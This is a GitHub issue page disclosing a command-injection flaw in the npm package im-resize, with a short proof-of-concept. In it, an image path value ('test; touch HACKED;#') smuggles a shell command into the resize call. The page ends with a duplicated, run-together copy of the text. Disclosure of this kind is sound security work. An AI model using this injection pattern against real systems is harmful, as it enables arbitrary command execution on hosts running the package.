This repository was archived by the owner on May 1, 2025. It is now read-only.
Description This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317 )
Vulnerability Description
The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115
Steps To Reproduce:
Create the following PoC file:
// poc.js
var resize = require ( 'im-resize' ) ;
var image = {
path : 'test; touch HACKED;#' ,
width : 5184 ,
height : 2623
} ;
var output = {
versions : [ {
suffix : '-thumb' ,
maxHeight : 150 ,
maxWidth : 150 ,
aspect : "3:2"
} , {
suffix : '-square' ,
maxWidth : 200 ,
aspect : "1:1"
} ]
} ;
resize ( image , output , function ( error ) { console . log ( ) } ) ;
Check there aren't files called HACKED
Execute the following commands in another terminal:
npm i im-resize # Install affected module
node poc.js # Run the PoC
Recheck the files: now HACKED has been created
Bug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/
Reactions are currently unavailable
This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)
Vulnerability Description
The issue occurs because a
user inputis formatted inside acommandthat will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115Steps To Reproduce:
HACKEDHACKEDhas been createdBug Bounty
We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/